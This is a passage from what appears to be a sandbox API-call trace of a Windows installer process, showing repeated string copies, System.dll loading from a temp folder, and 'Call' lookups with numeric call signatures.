lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.020] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.020] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.021] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0158.021] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | 
out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.021] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.021] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0158.021] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0158.021] lstrcpynA (in: lpString1=0x42e3a1, lpString2="3304992", iMaxLength=1024 | out: lpString1="3304992") returned="3304992" [0158.021] lstrlenA (lpString="3304992") returned 7 [0158.021] lstrcpynA (in: lpString1=0x336d34, lpString2="*3304992(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)", iMaxLength=1024 | out: lpString1="*3304992(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)") returned="*3304992(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)" [0158.021] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.021] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0158.021] lstrcpynA (in: 
lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.021] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.022] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.022] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.022] lstrcpyA (in: lpString1=0x321ba8, lpString2="3304992" | out: lpString1="3304992") returned="3304992" [0158.022] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.022] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.022] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.022] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.022] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.022] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.022] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.022] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.022] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.022] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.023] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.023] lstrcpynA (in: lpString1=0x336d30, lpString2="", 
iMaxLength=1024 | out: lpString1="") returned="" [0158.023] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.023] lstrcpyA (in: lpString1=0x431800, lpString2="0" | out: lpString1="0") returned="0" [0158.023] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="4") returned 1 [0158.023] lstrcpyA (in: lpString1=0x430800, lpString2="4" | out: lpString1="4") returned="4" [0158.023] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.023] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.023] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.023] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.023] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.023] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.023] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.023] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.023] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="5384") returned 4 [0158.023] lstrcpyA (in: lpString1=0x431000, lpString2="5384" | out: lpString1="5384") returned="5384" [0158.023] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="3304992") returned 7 [0158.023] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1224", iMaxLength=1024 | out: lpString1="1224") returned="1224" [0158.023] lstrlenA (lpString="1224") returned 4 [0158.023] lstrcpynA (in: lpString1=0x42e3a0, lpString2="4", iMaxLength=1024 | out: lpString1="4") returned="4" [0158.023] lstrlenA (lpString="4") returned 1 [0158.023] lstrcpynA (in: lpString1=0x42e3a0, lpString2="5384", iMaxLength=1024 | out: lpString1="5384") returned="5384" [0158.023] lstrlenA (lpString="5384") returned 4 [0158.023] lstrcpynA (in: lpString1=0x40ac18, lpString2="5384", iMaxLength=1024 | out: 
lpString1="5384") returned="5384" [0158.023] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.023] lstrcmpiA (lpString1="5384", lpString2="0") returned 1 [0158.023] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3304992", iMaxLength=1024 | out: lpString1="3304992") returned="3304992" [0158.023] lstrlenA (lpString="3304992") returned 7 [0158.023] lstrcpynA (in: lpString1=0x42e3a0, lpString2="5384", iMaxLength=1024 | out: lpString1="5384") returned="5384" [0158.023] lstrlenA (lpString="5384") returned 4 [0158.024] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3310376") returned 7 [0158.024] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.024] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.024] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.024] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.024] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.024] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") 
returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.024] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.024] lstrcpynA (in: lpString1=0x42e3a1, lpString2="3310376", iMaxLength=1024 | out: lpString1="3310376") returned="3310376" [0158.024] lstrlenA (lpString="3310376") returned 7 [0158.024] lstrcpynA (in: lpString1=0x336d34, lpString2="*3310376(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)", iMaxLength=1024 | out: lpString1="*3310376(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)") returned="*3310376(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)" [0158.024] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.025] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.025] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.025] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.025] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.025] lstrcpyA (in: lpString1=0x321ba8, lpString2="3310376" | out: lpString1="3310376") returned="3310376" [0158.025] lstrcpynA 
(in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.025] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.025] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.025] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.025] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.025] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.025] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.026] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.026] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.026] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.026] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.026] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.026] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="4") returned 1 [0158.026] lstrcpyA (in: lpString1=0x431800, lpString2="4" | out: lpString1="4") returned="4" [0158.026] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="264") returned 3 [0158.026] lstrcpyA (in: lpString1=0x430800, lpString2="264" | out: lpString1="264") returned="264" [0158.026] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.026] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.026] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.026] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") 
returned 1 [0158.026] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.026] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.026] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.026] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.026] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="336") returned 3 [0158.026] lstrcpyA (in: lpString1=0x431000, lpString2="336" | out: lpString1="336") returned="336" [0158.026] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="3310376") returned 7 [0158.026] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1224", iMaxLength=1024 | out: lpString1="1224") returned="1224" [0158.026] lstrlenA (lpString="1224") returned 4 [0158.026] lstrcpynA (in: lpString1=0x42e3a0, lpString2="264", iMaxLength=1024 | out: lpString1="264") returned="264" [0158.026] lstrlenA (lpString="264") returned 3 [0158.026] lstrcpynA (in: lpString1=0x42e3a0, lpString2="336", iMaxLength=1024 | out: lpString1="336") returned="336" [0158.026] lstrlenA (lpString="336") returned 3 [0158.027] lstrcpynA (in: lpString1=0x40ac18, lpString2="336", iMaxLength=1024 | out: lpString1="336") returned="336" [0158.027] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.027] lstrcmpiA (lpString1="336", lpString2="0") returned 1 [0158.027] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3310376", iMaxLength=1024 | out: lpString1="3310376") returned="3310376" [0158.027] lstrlenA (lpString="3310376") returned 7 [0158.027] lstrcpynA (in: lpString1=0x42e3a0, lpString2="336", iMaxLength=1024 | out: lpString1="336") returned="336" [0158.027] lstrlenA (lpString="336") returned 3 [0158.027] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3310712") returned 7 [0158.027] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", 
iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.027] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.027] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.027] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.027] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.027] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.027] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.027] lstrcpynA (in: lpString1=0x42e3a1, lpString2="3310712", iMaxLength=1024 | out: lpString1="3310712") returned="3310712" [0158.027] lstrlenA (lpString="3310712") returned 7 [0158.027] lstrcpynA (in: lpString1=0x336d34, lpString2="*3310712(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)", iMaxLength=1024 | out: lpString1="*3310712(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)") 
returned="*3310712(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)" [0158.027] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.027] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.027] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.028] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.028] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.028] lstrcpyA (in: lpString1=0x321ba8, lpString2="3310712" | out: lpString1="3310712") returned="3310712" [0158.028] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.028] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.028] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.028] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.028] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.028] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.028] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.028] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") 
returned="" [0158.029] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.029] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.029] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.029] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.029] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="324") returned 3 [0158.029] lstrcpyA (in: lpString1=0x431800, lpString2="324" | out: lpString1="324") returned="324" [0158.029] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="332") returned 3 [0158.029] lstrcpyA (in: lpString1=0x430800, lpString2="332" | out: lpString1="332") returned="332" [0158.029] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.029] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.029] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.029] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.029] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.029] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.029] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.029] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.029] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="784") returned 3 [0158.029] lstrcpyA (in: lpString1=0x431000, lpString2="784" | out: lpString1="784") returned="784" [0158.029] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="3310712") returned 7 [0158.029] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1224", iMaxLength=1024 | out: lpString1="1224") returned="1224" [0158.029] lstrlenA (lpString="1224") returned 4 [0158.029] 
lstrcpynA (in: lpString1=0x42e3a0, lpString2="332", iMaxLength=1024 | out: lpString1="332") returned="332" [0158.029] lstrlenA (lpString="332") returned 3 [0158.029] lstrcpynA (in: lpString1=0x42e3a0, lpString2="784", iMaxLength=1024 | out: lpString1="784") returned="784" [0158.029] lstrlenA (lpString="784") returned 3 [0158.029] lstrcpynA (in: lpString1=0x40ac18, lpString2="784", iMaxLength=1024 | out: lpString1="784") returned="784" [0158.029] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.029] lstrcmpiA (lpString1="784", lpString2="0") returned 1 [0158.030] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3310712", iMaxLength=1024 | out: lpString1="3310712") returned="3310712" [0158.030] lstrlenA (lpString="3310712") returned 7 [0158.030] lstrcpynA (in: lpString1=0x42e3a0, lpString2="784", iMaxLength=1024 | out: lpString1="784") returned="784" [0158.030] lstrlenA (lpString="784") returned 3 [0158.030] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3311496") returned 7 [0158.030] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.030] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.030] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.030] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.030] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: 
lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.030] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.030] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.030] lstrcpynA (in: lpString1=0x42e3a1, lpString2="3311496", iMaxLength=1024 | out: lpString1="3311496") returned="3311496" [0158.030] lstrlenA (lpString="3311496") returned 7 [0158.030] lstrcpynA (in: lpString1=0x336d34, lpString2="*3311496(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)", iMaxLength=1024 | out: lpString1="*3311496(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)") returned="*3311496(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)" [0158.030] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.030] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.030] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") 
returned="Call" [0158.031] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.031] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.031] lstrcpyA (in: lpString1=0x321ba8, lpString2="3311496" | out: lpString1="3311496") returned="3311496" [0158.031] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.031] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.031] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.031] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.031] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.031] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.031] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.031] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.031] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.031] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" 